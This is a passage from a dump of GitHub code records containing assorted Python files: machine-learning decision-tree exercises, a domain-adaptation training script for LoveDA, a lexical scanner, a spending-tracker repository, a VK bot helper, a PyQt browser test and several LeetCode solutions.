tableName)\n","repo_name":"v3io/frames","sub_path":"clients/py/tests/test_integration.py","file_name":"test_integration.py","file_ext":"py","file_size_in_byte":7388,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"32"} +{"seq_id":"13793502934","text":"from IPython.display import Image\r\nfrom sklearn import tree\r\nimport pydotplus\r\nfrom sklearn.tree import DecisionTreeClassifier\r\nfrom sklearn import datasets\r\nimport matplotlib.pyplot as plt\r\n\r\niris = datasets.load_iris()\r\nfeatures = iris['data']\r\ntarget = iris['target']\r\n\r\ndecisiontree = DecisionTreeClassifier(random_state=0, max_depth=None,\r\n min_samples_split=2, min_samples_leaf=1,\r\n min_weight_fraction_leaf=0,\r\n max_leaf_nodes=None,\r\n min_impurity_decrease=0)\r\n\r\n\r\n# mentraining model>\r\nmodel = decisiontree.fit(features, target)\r\n\r\n# mengambil sempel oberasiv dan membuat prediksi\r\n# sempel berupa data dimensi kelompok\r\n# fungsi predic() => memriksa kelas yang dimiliki\r\n# fungsi predic_promba > memeriksa probabilitas kelas dari prediksi\r\nobservation = [[5, 4, 3, 2]]\r\nmodel.predict(observation)\r\nmodel.predict_proba(observation)\r\n\r\n# membuat grafik visualisasi DT\r\ndot_data = tree.export_graphviz(decisiontree, out_file=None,\r\n feature_names=iris['feature_names'],\r\n class_names=iris['target_names'])\r\ngraph = pydotplus.graph_from_dot_data(dot_data)\r\nImage(graph.create_png())\r\ngraph.write_png('iris.png')\r\n","repo_name":"yudhapest/Python","sub_path":"Data-Mining/Decision 
Tree/DecisionTree.py","file_name":"DecisionTree.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"2495330853","text":"# Code you have previously used to load data\nimport pandas as pd\nfrom sklearn.metrics import mean_absolute_error\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.tree import DecisionTreeRegressor\n\n\n# Path of the file to read\niowa_file_path = '../input/home-data-for-ml-course/train.csv'\n\nhome_data = pd.read_csv(iowa_file_path)\n# Create target object and call it y\ny = home_data.SalePrice\n# Create X\nfeatures = ['LotArea', 'YearBuilt', '1stFlrSF', '2ndFlrSF', 'FullBath', 'BedroomAbvGr', 'TotRmsAbvGrd']\nX = home_data[features]\n\n# Split into validation and training data\ntrain_X, val_X, train_y, val_y = train_test_split(X, y, random_state=1)\n\n# Specify Model\niowa_model = DecisionTreeRegressor(random_state=1)\n# Fit Model\niowa_model.fit(train_X, train_y)\n\n# Make validation predictions and calculate mean absolute error\nval_predictions = iowa_model.predict(val_X)\nval_mae = mean_absolute_error(val_predictions, val_y)\nprint(\"Validation MAE when not specifying max_leaf_nodes: {:,.0f}\".format(val_mae))\n\n# Using best value for max_leaf_nodes\niowa_model = DecisionTreeRegressor(max_leaf_nodes=100, random_state=1)\niowa_model.fit(train_X, train_y)\nval_predictions = iowa_model.predict(val_X)\nval_mae = mean_absolute_error(val_predictions, val_y)\nprint(\"Validation MAE for best value of max_leaf_nodes: {:,.0f}\".format(val_mae))\n\n\n# Set up code checking\nfrom learntools.core import binder\nbinder.bind(globals())\nfrom learntools.machine_learning.ex6 import *\nprint(\"\\nSetup complete\")","repo_name":"gagandeepahuja09/tech_articles","sub_path":"ml_basics/intro_ml_kaggle/decision_tree.py","file_name":"decision_tree.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"24280938592","text":"from pdb import run\nfrom db.run_sql import run_sql\nfrom operator import attrgetter\nfrom models.transaction import Transaction\nimport repositories.tag_repository as tag_repository\nimport repositories.merchant_repository as merchant_repository\n\ndef save(transaction):\n sql = \"INSERT INTO transactions (amount, tag_id, merchant_id, date) VALUES (%s, %s, %s, %s) RETURNING id\"\n values = [transaction.amount, transaction.tag.id, transaction.merchant.id, transaction.date]\n results = run_sql(sql, values)\n id = results[0]['id']\n transaction.id = id\n return transaction\n\ndef delete_all():\n sql = \"DELETE FROM transactions\"\n\ndef delete(id):\n sql = \"DELETE FROM transactions WHERE id = %s\"\n values = [id]\n run_sql(sql, values)\n\ndef update(transaction):\n sql = \"UPDATE transactions SET (amount, tag_id, merchant_id, date) = (%s, %s, %s, %s) WHERE id = %s\"\n values = [transaction.amount, transaction.tag.id, transaction.merchant.id, transaction.date, transaction.id]\n run_sql(sql, values)\n\ndef select(id):\n transaction = None\n sql = \"SELECT * FROM transactions WHERE id = %s\"\n values = [id]\n result = run_sql(sql, values)[0]\n\n if result is not None:\n tag = tag_repository.select(result['tag_id'])\n merchant = merchant_repository.select(result['merchant_id'])\n transaction = Transaction(result['amount'], tag, merchant, result['date'], result['id'])\n return transaction\n\ndef select_all():\n transactions = []\n sql = \"SELECT * FROM 
transactions\"\n results = run_sql(sql)\n for row in results:\n tag = tag_repository.select(row['tag_id'])\n merchant = merchant_repository.select(row['merchant_id'])\n transaction = Transaction(row['amount'], tag, merchant, row['date'], row['id'])\n transactions.insert(0, transaction)\n return transactions\n\ndef total_spending():\n total_spend = 0\n transactions = select_all()\n for transaction in transactions:\n total_spend += transaction.amount\n return total_spend\n\n\ndef select_all_by_date():\n transactions = []\n sql = \"SELECT * FROM transactions ORDER BY date DESC\"\n results = run_sql(sql)\n for row in results:\n tag = tag_repository.select(row['tag_id'])\n merchant = merchant_repository.select(row['merchant_id'])\n transaction = Transaction(row['amount'], tag, merchant, row['date'], row['id'])\n transactions.append(transaction)\n return transactions\n\ndef select_all_by_amount():\n transactions = []\n sql = \"SELECT * FROM transactions ORDER BY amount DESC\"\n results = run_sql(sql)\n for row in results:\n tag = tag_repository.select(row['tag_id'])\n merchant = merchant_repository.select(row['merchant_id'])\n transaction = Transaction(row['amount'], tag, merchant, row['date'], row['id'])\n transactions.append(transaction)\n return transactions\n\n\n\n \n\n\n\n\n\n\n \n","repo_name":"madgelackie/spending_tracker_project","sub_path":"repositories/transaction_repository.py","file_name":"transaction_repository.py","file_ext":"py","file_size_in_byte":2905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7699741018","text":"class Solution:\n def subsets(self, nums: List[int]) -> List[List[int]]:\n \n # []\n # [] [1]\n # [] [1] [2] [1,2]\n # [] [1] [2] [1,2], [3] [1,3] [2,3] [1,2,3]\n \n res = []\n res += [],\n for num in nums:\n n = len(res)\n for i in range(n):\n res += (res[i][:] + [num]),\n \n return res","repo_name":"DarshanGowda0/LC-Grind","sub_path":"Daily-Grind/62.py","file_name":"62.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"22949485429","text":"import argparse\nimport os.path as osp\nimport torch.backends.cudnn as cudnn\nimport torch.optim as optim\nimport math\nfrom eval import evaluate\nfrom utils.tools import *\nfrom module.Encoder import Deeplabv2\nfrom data.loveda import LoveDALoader\nfrom utils.tools import COLOR_MAP\nfrom ever.core.iterator import Iterator\nfrom tqdm import tqdm\nfrom torch.nn.utils import clip_grad\nimport ever as er\nfrom skimage.io import imsave, imread\npalette = np.asarray(list(COLOR_MAP.values())).reshape((-1,)).tolist()\n\n\n\nparser = argparse.ArgumentParser(description='Run CBST methods.')\n\nparser.add_argument('--config_path', type=str,\n help='config path')\nargs = parser.parse_args()\ncfg = import_config(args.config_path)\n\ndef main():\n os.makedirs(cfg.SNAPSHOT_DIR, exist_ok=True)\n logger = get_console_file_logger(name='CBST', logdir=cfg.SNAPSHOT_DIR)\n cudnn.enabled = True\n\n save_pseudo_label_path = osp.join(cfg.SNAPSHOT_DIR, 'pseudo_label') # in 'save_path'. 
Save labelIDs, not trainIDs.\n save_stats_path = osp.join(cfg.SNAPSHOT_DIR, 'stats') # in 'save_path'\n \n if not os.path.exists(cfg.SNAPSHOT_DIR):\n os.makedirs(cfg.SNAPSHOT_DIR)\n if not os.path.exists(save_pseudo_label_path):\n os.makedirs(save_pseudo_label_path)\n if not os.path.exists(save_stats_path):\n os.makedirs(save_stats_path)\n \n\n model = Deeplabv2(dict(\n backbone=dict(\n resnet_type='resnet50',\n output_stride=16,\n pretrained=True,\n ),\n multi_layer=False,\n cascade=False,\n use_ppm=True,\n ppm=dict(\n num_classes=7,\n use_aux=False,\n ),\n inchannels=2048,\n num_classes=7\n )).cuda()\n \n \n trainloader = LoveDALoader(cfg.SOURCE_DATA_CONFIG)\n trainloader_iter = Iterator(trainloader)\n evalloader = LoveDALoader(cfg.EVAL_DATA_CONFIG)\n # targetloader_iter = Iterator(targetloader)\n epochs = cfg.NUM_STEPS_STOP / len(trainloader)\n logger.info('epochs ~= %.3f' % epochs)\n\n optimizer = optim.SGD(model.parameters(),\n lr=cfg.LEARNING_RATE, momentum=cfg.MOMENTUM, weight_decay=cfg.WEIGHT_DECAY)\n optimizer.zero_grad()\n # mix_trainloader = None\n targetloader = None\n\n for i_iter in tqdm(range(cfg.NUM_STEPS_STOP)):\n if i_iter < cfg.WARMUP_STEP:\n # Train with Source\n optimizer.zero_grad()\n lr = adjust_learning_rate(optimizer, i_iter, cfg)\n batch = trainloader_iter.next()\n images_s, labels_s = batch[0]\n pred_source = model(images_s.cuda())\n pred_source = pred_source[0] if isinstance(pred_source, tuple) else pred_source\n #Segmentation Loss\n loss = loss_calc(pred_source, labels_s['cls'].cuda())\n # with amp.scale_loss(loss, optimizer) as scaled_loss:\n loss.backward()\n clip_grad.clip_grad_norm_(filter(lambda p: p.requires_grad, model.parameters()), max_norm=35, norm_type=2)\n optimizer.step()\n\n if i_iter % 50 == 0:\n logger.info('exp = {}'.format(cfg.SNAPSHOT_DIR))\n text = 'iter = %d, loss_seg = %.3f, lr = %.3f'% (\n i_iter, loss, lr)\n logger.info(text)\n if i_iter >= cfg.NUM_STEPS_STOP - 1:\n print('save model ...')\n ckpt_path = osp.join(cfg.SNAPSHOT_DIR, cfg.TARGET_SET + str(cfg.NUM_STEPS_STOP) + '.pth')\n torch.save(model.state_dict(), ckpt_path)\n evaluate(model, cfg, True, ckpt_path, logger)\n break\n if i_iter % cfg.EVAL_EVERY == 0 and i_iter != 0:\n ckpt_path = osp.join(cfg.SNAPSHOT_DIR, cfg.TARGET_SET + str(i_iter) + '.pth')\n torch.save(model.state_dict(), ckpt_path)\n evaluate(model, cfg, True, ckpt_path, logger)\n model.train()\n else:\n if i_iter % cfg.GENERATE_PSEDO_EVERY == 0 or targetloader is None:\n logger.info('###### Start generate pesudo dataset in round {}! 
######'.format(i_iter))\n save_round_eval_path = osp.join(cfg.SNAPSHOT_DIR, str(i_iter))\n save_pseudo_label_color_path = osp.join(save_round_eval_path, 'pseudo_label_color') # in every 'save_round_eval_path'\n if not os.path.exists(save_round_eval_path):\n os.makedirs(save_round_eval_path)\n if not os.path.exists(save_pseudo_label_color_path):\n os.makedirs(save_pseudo_label_color_path)\n # evaluation & save confidence vectors\n conf_dict, pred_cls_num, save_prob_path, save_pred_path, image_name_tgt_list = val(model, evalloader, save_round_eval_path, cfg)\n # class-balanced thresholds\n tgt_portion = min(cfg.TGT_PORTION + cfg.TGT_PORTION_STEP, cfg.MAX_TGT_PORTION)\n cls_thresh = kc_parameters(conf_dict, pred_cls_num, tgt_portion, i_iter, save_stats_path, cfg, logger)\n print('CLS THRESH', cls_thresh)\n # pseudo-label maps generation\n label_selection(cls_thresh, image_name_tgt_list, i_iter, save_prob_path, save_pred_path, save_pseudo_label_path, save_pseudo_label_color_path, save_round_eval_path, logger)\n ########### model retraining\n target_config = cfg.TARGET_DATA_CONFIG\n target_config['mask_dir'] = [save_pseudo_label_path]\n logger.info(target_config)\n targetloader = LoveDALoader(target_config)\n targetloader_iter = Iterator(targetloader)\n logger.info('###### Start model retraining dataset in round {}! ######'.format(i_iter))\n\n model.train()\n lr = adjust_learning_rate(optimizer, i_iter, cfg)\n batch = trainloader_iter.next()\n\n images_s, labels_s = batch[0]\n pred_source = model(images_s.cuda())\n pred_source = pred_source[0] if isinstance(pred_source, tuple) else pred_source\n\n batch = targetloader_iter.next()\n images_t, labels_t = batch[0]\n pred_target = model(images_t.cuda())\n pred_target = pred_target[0] if isinstance(pred_target, tuple) else pred_target\n\n loss = loss_calc(pred_source, labels_s['cls'].cuda()) * cfg.SOURCE_LOSS_WEIGHT + loss_calc(pred_target, labels_t['cls'].cuda()) * cfg.PSEUDO_LOSS_WEIGHT\n optimizer.zero_grad()\n loss.backward()\n clip_grad.clip_grad_norm_(filter(lambda p: p.requires_grad, model.parameters()), max_norm=35, norm_type=2)\n optimizer.step()\n if i_iter % 50 == 0:\n logger.info('exp = {}'.format(cfg.SNAPSHOT_DIR))\n text = 'Mix iter = %d, loss_seg = %.3f, lr = %.3f'% (\n i_iter, loss, lr)\n logger.info(text)\n\n if i_iter >= cfg.NUM_STEPS_STOP - 1:\n print('save model ...')\n ckpt_path = osp.join(cfg.SNAPSHOT_DIR, cfg.TARGET_SET + str(cfg.NUM_STEPS_STOP) + '.pth')\n torch.save(model.state_dict(), ckpt_path)\n evaluate(model, cfg, True, ckpt_path, logger)\n break\n if i_iter % cfg.EVAL_EVERY == 0 and i_iter != 0:\n ckpt_path = osp.join(cfg.SNAPSHOT_DIR, cfg.TARGET_SET + str(i_iter) + '.pth')\n torch.save(model.state_dict(), ckpt_path)\n evaluate(model, cfg, True, ckpt_path, logger)\n model.train()\n\n\ndef val(model, targetloader, save_round_eval_path, cfg):\n \"\"\"Create the model and start the evaluation process.\"\"\"\n\n model.eval()\n ## output folder\n save_pred_vis_path = osp.join(save_round_eval_path, 'pred_vis')\n save_prob_path = osp.join(save_round_eval_path, 'prob')\n save_pred_path = osp.join(save_round_eval_path, 'pred')\n\n #viz_op = er.viz.VisualizeSegmm(save_pred_vis_path, palette)\n # metric_op = er.metric.PixelMetric(len(COLOR_MAP.keys()), logdir=cfg.SNAPSHOT_DIR, logger=logger)\n\n\n if not os.path.exists(save_prob_path):\n os.makedirs(save_prob_path)\n if not os.path.exists(save_pred_path):\n os.makedirs(save_pred_path)\n\n # saving output data\n conf_dict = {k: [] for k in range(cfg.NUM_CLASSES)}\n pred_cls_num = 
np.zeros(cfg.NUM_CLASSES)\n ## evaluation process\n image_name_tgt_list = []\n with torch.no_grad():\n for batch in tqdm(targetloader):\n images, labels = batch\n output = model(images.cuda()).softmax(dim=1)\n output = output[0] if isinstance(output, tuple) else output\n pred_label = output.argmax(dim=1).cpu().numpy()\n output = output.cpu().numpy()\n for fname, pred_i, out_i in zip(labels['fname'], pred_label, output):\n image_name_tgt_list.append(fname.split('.')[0])\n # save prob\n #viz_op(pred_i, fname)\n np.save('%s/%s' % (save_prob_path, fname.replace('png', 'npy')), out_i)\n imsave('%s/%s' % (save_pred_path, fname), pred_i.astype(np.uint8), check_contrast=False)\n out_i = out_i.transpose(1,2,0)\n conf_i = np.amax(out_i,axis=2)\n # save class-wise confidence maps\n if cfg.KC_VALUE == 'conf':\n for idx_cls in range(cfg.NUM_CLASSES):\n idx_temp = pred_i == idx_cls\n pred_cls_num[idx_cls] = pred_cls_num[idx_cls] + np.sum(idx_temp)\n if idx_temp.any():\n conf_cls_temp = conf_i[idx_temp].astype(np.float32)\n len_cls_temp = conf_cls_temp.size\n # downsampling by ds_rate\n conf_cls = conf_cls_temp[0:len_cls_temp:cfg.DS_RATE]\n conf_dict[idx_cls].extend(conf_cls)\n\n return conf_dict, pred_cls_num, save_prob_path, save_pred_path, image_name_tgt_list # return the dictionary containing all the class-wise confidence vectors\n\n\ndef kc_parameters(conf_dict, pred_cls_num, tgt_portion, round_idx, save_stats_path, cfg, logger):\n logger.info('###### Start kc generation in round {} ! ######'.format(round_idx))\n start_kc = time.time()\n # threshold for each class\n cls_thresh = np.ones(cfg.NUM_CLASSES,dtype = np.float32)\n cls_sel_size = np.zeros(cfg.NUM_CLASSES, dtype=np.float32)\n cls_size = np.zeros(cfg.NUM_CLASSES, dtype=np.float32)\n # if cfg.KC_POLICY == 'cb' and cfg.KC_VALUE == 'conf':\n for idx_cls in np.arange(0, cfg.NUM_CLASSES):\n cls_size[idx_cls] = pred_cls_num[idx_cls]\n if conf_dict[idx_cls] != None:\n conf_dict[idx_cls].sort(reverse=True) # sort in descending order\n len_cls = len(conf_dict[idx_cls])\n cls_sel_size[idx_cls] = int(math.floor(len_cls * tgt_portion))\n len_cls_thresh = int(cls_sel_size[idx_cls])\n if len_cls_thresh != 0:\n cls_thresh[idx_cls] = conf_dict[idx_cls][len_cls_thresh-1]\n conf_dict[idx_cls] = None\n\n # threshold for mine_id with priority\n num_mine_id = len(np.nonzero(cls_size / np.sum(cls_size) < cfg.MINE_PORT)[0])\n # chose the smallest mine_id\n id_all = np.argsort(cls_size / np.sum(cls_size))\n rare_id = id_all[:cfg.RARE_CLS_NUM]\n mine_id = id_all[:num_mine_id] # sort mine_id in ascending order w.r.t predication portions\n # save mine ids\n np.save(save_stats_path + '/rare_id_round' + str(round_idx) + '.npy', rare_id)\n np.save(save_stats_path + '/mine_id_round' + str(round_idx) + '.npy', mine_id)\n logger.info('Mining ids : {}! {} rarest ids: {}!'.format(mine_id, cfg.RARE_CLS_NUM, rare_id))\n # save thresholds\n np.save(save_stats_path + '/cls_thresh_round' + str(round_idx) + '.npy', cls_thresh)\n np.save(save_stats_path + '/cls_sel_size_round' + str(round_idx) + '.npy', cls_sel_size)\n logger.info('###### Finish kc generation in round {}! Time cost: {:.2f} seconds. ######'.format(round_idx,time.time() - start_kc))\n return cls_thresh\n\ndef label_selection(cls_thresh, image_name_tgt_list, round_idx, save_prob_path, save_pred_path, save_pseudo_label_path, save_pseudo_label_color_path, save_round_eval_path, logger):\n logger.info('###### Start pseudo-label generation in round {} ! 
######'.format(round_idx))\n start_pl = time.time()\n #viz_op = er.viz.VisualizeSegmm(save_pseudo_label_color_path, palette)\n for sample_name in image_name_tgt_list:\n probmap_path = osp.join(save_prob_path, '{}.npy'.format(sample_name))\n pred_prob = np.load(probmap_path)\n weighted_prob = pred_prob / cls_thresh[:,None, None]\n weighted_pred_trainIDs = np.asarray(np.argmax(weighted_prob, axis=0), dtype=np.uint8)\n weighted_conf = np.amax(weighted_prob, axis=0)\n pred_label_trainIDs = weighted_pred_trainIDs.copy()\n pred_label_labelIDs = pred_label_trainIDs + 1\n \n pred_label_labelIDs[weighted_conf < 1] = 0 # '0' in LoveDA Dataset ignore\n # pseudo-labels with labelID\n #viz_op(pred_label_trainIDs, '%s_color.png' % sample_name)\n\n # save pseudo-label map with label IDs\n imsave(os.path.join(save_pseudo_label_path, '%s.png' % sample_name), pred_label_labelIDs, check_contrast=False)\n \n # remove probability maps\n if cfg.RM_PROB:\n shutil.rmtree(save_prob_path)\n\n logger.info('###### Finish pseudo-label generation in round {}! Time cost: {:.2f} seconds. ######'.format(round_idx,time.time() - start_pl))\n\n\nif __name__ == '__main__':\n seed_torch(2333)\n main()\n","repo_name":"Junjue-Wang/LoveDA","sub_path":"Unsupervised_Domian_Adaptation/CBST_train.py","file_name":"CBST_train.py","file_ext":"py","file_size_in_byte":13660,"program_lang":"python","lang":"en","doc_type":"code","stars":265,"dataset":"github-code","pt":"32"} +{"seq_id":"28711715593","text":"from collections import Counter\n\nclass Solution:\n def findAnagrams(self, s: str, p: str) -> List[int]:\n N, n = len(s), len(p)\n anagrams = dict(Counter(p))\n pointer = 0\n result = []\n \n while pointer < N :\n ch = s[pointer]\n if pointer >= n and s[pointer-n] in anagrams :\n anagrams[s[pointer-n]] += 1\n if ch in anagrams :\n anagrams[ch] -= 1\n if set(anagrams.values()) == {0} : result.append(pointer-n+1)\n pointer += 1\n \n return result","repo_name":"sbyeol3/Algorithm-Study","sub_path":"LeetCode/Q1-Q500/Q438.py","file_name":"Q438.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"39806327568","text":"import os\nimport re\nfrom model.abstract_data_types.hash_table import HashTable\nfrom model.abstract_data_types.list import List\nfrom finite_automata.finite_automata import FiniteAutomata\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\nPATH_TOKENS = os.getenv(\"PATH_TOKENS\")\n\n\nclass Scanner:\n def __init__(self, problem_path: str):\n with open(PATH_TOKENS) as file:\n self.__tokens = [line.strip() for line in file.readlines()]\n self.__symbol_table_identifier = HashTable()\n self.__symbol_table_constant = HashTable()\n self.__program_internal_form = List()\n self.__finite_automata = FiniteAutomata()\n with open(problem_path) as file:\n self.__problem_text = file.readlines()\n self.__scan()\n\n def __scan(self):\n error = \"Lexically Correct\"\n for index, line in enumerate(self.__problem_text):\n if re.match(r\"^\\s*$\", line):\n continue\n aux_line = line.strip()\n\n lexemes = self.sequence_to_lexemes(aux_line)\n lexemes = self.concatenate_signed_integers(lexemes)\n for lexeme in lexemes:\n verify_by_fa = self.__finite_automata.verify_lexeme(lexeme)\n if lexeme in self.__tokens:\n self.__program_internal_form.add(lexeme, -1)\n elif verify_by_fa == \"IDENTIFIER\":\n index_id = self.__symbol_table_identifier.add(lexeme)\n self.__program_internal_form.add(lexeme, index_id)\n elif verify_by_fa == \"INTEGER\" or 
re.match(\"^(\\\"[^\\\"]*\\\")$\", lexeme):\n index_id = self.__symbol_table_constant.add(lexeme)\n self.__program_internal_form.add(lexeme, index_id)\n else:\n index_error = self.__problem_text[index].find(lexeme)\n error = f\"Lexical Error! Line {index + 1} Col {index_error + 1}\\n\"\n error += self.__problem_text[index][:-1] + \"\\n\"\n error += \" \" * index_error + \"^\" * len(lexeme)\n break\n else:\n continue\n break\n self.write_to_file_st_pif(error)\n\n def write_to_file_st_pif(self, error):\n with open(\"PIF.out\", \"w\") as file:\n file.write(str(self.__program_internal_form) + \"\\n\\n\" + error)\n with open(\"ST.out\", \"w\") as file:\n file.write(\"IDENTIFIERS:\\n\" + str(self.__symbol_table_identifier) + \"\\n\\nCONSTANTS:\\n\" +\n str(self.__symbol_table_constant))\n\n def concatenate_signed_integers(self, lexemes):\n i = 0\n result = []\n parentheses = [\"]\", \")\", \"}\"]\n while i < len(lexemes):\n if (lexemes[i] == \"+\" or lexemes[i] == \"-\") and (\n i == 0 or (i != 0 and lexemes[i - 1] in self.__tokens)) and i + 1 < len(lexemes) \\\n and re.match(\"^(\\d|[1-9]\\d*)$\", lexemes[i + 1]) and lexemes[i - 1] not in parentheses:\n result.append(lexemes[i] + lexemes[i + 1])\n i += 2\n else:\n result.append(lexemes[i])\n i += 1\n return result\n\n @staticmethod\n def sequence_to_lexemes(sequence: str) -> list[str]:\n list_of_lexemes = []\n delimiter = [\",\", \";\", \"(\", \")\", \"[\", \"]\", \"{\", \"}\", \" \", \"+\", \"-\", \"*\", \"/\", \"%\", \">\", \"<\", \"=\"]\n soft_delimiter = [\">\", \"<\", \"=\"]\n start = 0\n end = 0\n last_char = \"\"\n while end < len(sequence):\n if sequence[end] == \"\\\"\":\n if len(last_char) == 0:\n start = end\n result = sequence[end + 1:].find(\"\\\"\")\n if result == -1:\n list_of_lexemes.append(sequence[start:])\n return list_of_lexemes\n else:\n end += result + 2\n if end >= len(sequence):\n list_of_lexemes.append(sequence[start:end])\n return list_of_lexemes\n if sequence[end] in delimiter:\n list_of_lexemes.append(sequence[start:end])\n if sequence[end] != \" \":\n list_of_lexemes.append(sequence[end])\n start = end + 1\n else:\n list_of_lexemes.append(sequence[start:end])\n list_of_lexemes.append(sequence[end:])\n return list_of_lexemes\n else:\n list_of_lexemes.append(sequence[start:end + 1])\n return list_of_lexemes\n else:\n if sequence[end] == \" \" and len(last_char) == 0:\n end += 1\n start = end\n continue\n if sequence[end] in delimiter:\n if len(last_char) != 0:\n last_char = \"\"\n list_of_lexemes.append(sequence[start:end])\n if (sequence[end] in soft_delimiter and end + 1 < len(sequence)\n and sequence[end + 1] in soft_delimiter):\n list_of_lexemes.append(sequence[end:end + 2])\n end += 1\n elif sequence[end] != \" \":\n list_of_lexemes.append(sequence[end])\n start = end + 1\n else:\n last_char = sequence[end]\n end += 1\n\n return list_of_lexemes\n","repo_name":"Sipos-Lucas-George/Formal-Languages-and-Compiler-Techniques","sub_path":"Mini Language/scanner/scanner.py","file_name":"scanner.py","file_ext":"py","file_size_in_byte":5613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"37001174046","text":"import vk\nimport settings\nimport methods_for_db\nimport datetime\n\n\ndef get_posts(user_id, group_id):\n if not methods_for_db.have_subs(user_id):\n return []\n\n last_post_date = methods_for_db.get_group_last_date(user_id, group_id)\n\n session = vk.Session(access_token=settings.service_key)\n vk_api = vk.API(session, v=settings.vk_api_version)\n\n wall 
= vk_api.wall.get(owner_id='-' + str(group_id), count=10)['items']\n\n now_d = datetime.datetime.now()\n new_time = int(now_d.timestamp())\n\n ans = [rec for rec in reversed(wall) if rec['date'] > last_post_date]\n\n methods_for_db.update_group_last_date(user_id, group_id, new_time)\n\n return ans\n\n\ndef get_group(group_link):\n short_name = group_link[15::]\n session = vk.Session(access_token=settings.access_key)\n vk_api = vk.API(session, v=settings.vk_api_version)\n cur_group = vk_api.groups.getById(group_id = short_name)[0]\n\n if str(cur_group['id']) == str(settings.bot_group_id) and group_link != settings.bot_group_link:\n return 'link_error'\n\n return cur_group\n\n\ndef get_group_name(group_id):\n session = vk.Session(access_token=settings.access_key)\n vk_api = vk.API(session, v=settings.vk_api_version)\n cur_group = vk_api.groups.getById(group_id=group_id)[0]\n return cur_group['name']\n","repo_name":"alexvi88/vk_subs_bot","sub_path":"groups_tools.py","file_name":"groups_tools.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21310056949","text":"import sys\nfrom webbrowser import browser\n\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtWebEngineWidgets import QWebEngineView\nfrom PyQt5.QtWidgets import QPushButton, QApplication, QMainWindow, QToolBar, QAction\n\n\nclass SubWindow(QToolBar):\n def __init__(self,main=None):\n super(SubWindow, self).__init__()\n #self.browser = Browser()\n\n test_action = QAction(\"TEST\", self)\n\n test_action.triggered.connect(self.test)\n self.addAction(test_action)\n\n def closeEvent(self, event):\n self.deleteLater()\n event.accept()\n @staticmethod\n def test():\n browser.back()\n browser.reload()\n\n\n\n\n def set_url(self):\n self.browser.setUrl(QUrl('https://onet.pl'))\n\n\nclass MainWindow(QMainWindow):\n def __init__(self):\n super(MainWindow, self).__init__()\n self.toolbar = QToolBar()\n\n self.openButton = QPushButton(\"Open Sub Window\", self)\n self.openButton.clicked.connect(self.openSub)\n\n self.change = QPushButton(\"Change\", self)\n self.change.clicked.connect(self.set_url)\n self.toolbar.addWidget(self.openButton)\n self.toolbar.addWidget(self.change)\n\n self.browser = Browser()\n self.setCentralWidget(self.browser)\n self.browser.setUrl(QUrl('https://wp.pl'))\n self.addToolBar(self.toolbar)\n\n\n def openSub(self):\n self.subWindow = SubWindow()\n self.subWindow.show()\n\n\n\n\n def set_url(self):\n self.browser.setUrl(QUrl('https://onet.pl'))\n\n def closeEvent(self, event):\n event.accept()\n\n\n def test_action(self):\n\n print('kjnfv')\n\n\n\nclass Browser(QWebEngineView):\n def __init__(self):\n super(QWebEngineView,self).__init__()\n self.setUrl(QUrl('https://wp.pl'))\n\n\n\n\napp = QApplication(sys.argv)\nmainWin = MainWindow()\nmainWin.show()\nbrowser = Browser()\n\n\nsys.exit(app.exec_())\n","repo_name":"piter1316/WebBrowser","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"11232660673","text":"# 参考: https://leetcode.com/problems/valid-parenthesis-string/discuss/543521/Java-Count-Open-Parenthesis-O(n)-time-O(1)-space-Picture-Explain\n# 这个方法比较难理解,大意是:由于我不知道 * 可能是哪种情况,所以我干脆在遍历的过程中讨论所有可能的情形,具体操作如下:\n# (必须结合连接中的图进行理解)(虽然这个方法很难想,但 Leetcode 上 Discuss 的前三都是这种方法及其变种,所以还是得掌握)\n# 1. 用 cmax 保存直至当前字符,在所有可能分支中,待匹配的 '(' 的个数的最大值\n# 2. 
用 cmin 保存直至当前字符,在所有可能分支中,待匹配的 '(' 的个数的最小值\n# 遍历字符串:\n# 1. 若当前字符为 '(' ,则 cmin 和 cmax 都自增 1\n# 2. 若当前字符为 ')' ,则 cmin 和 cmax 都自减 1。若 cmin < 0,则令 cmin = 0,即抛弃那些不成立的分支\n# 3. 若当前字符为 '*' ,对应了三种可能的情形:\n# a. '*' 取 '(': cmax 自增 1\n# b. '*' 取 ')': cmin 自减 1\n# c. '*' 取 '': 无变化\n# 由于要同时考虑以上三种情况,所以在此分支下,cmax 自�� 1,cmin 自减 1\n# 4. 在进行上述操作后,如果 cmax 小于 0,则意味着没有任何一个分支满足题目的要求,直接返回 False\n# 遍历字符串后,cmin 为 0 则表明有至少一条分支满足:无待匹配的 '(',故返回 True\n# 如果 cmin > 0,表明没有一条分支满足无待匹配的 '(',故返回 False\ndef solution(s):\n cmin, cmax = 0, 0\n for c in s:\n if c == '(':\n cmin += 1\n cmax += 1\n elif c == ')':\n cmin -= 1\n cmax -= 1\n elif c == '*':\n cmin -= 1\n cmax += 1\n if cmax < 0:\n return False\n if cmin < 0:\n cmin = 0\n return cmin == 0\n\n\n# TEST\ns = \"(((((*(()((((*((**(((()()*)()()()*((((**)())*)*)))))))(())(()))())((*()()(((()((()*(())*(()**)()(())\"\nprint(solution(s)) # correct value: 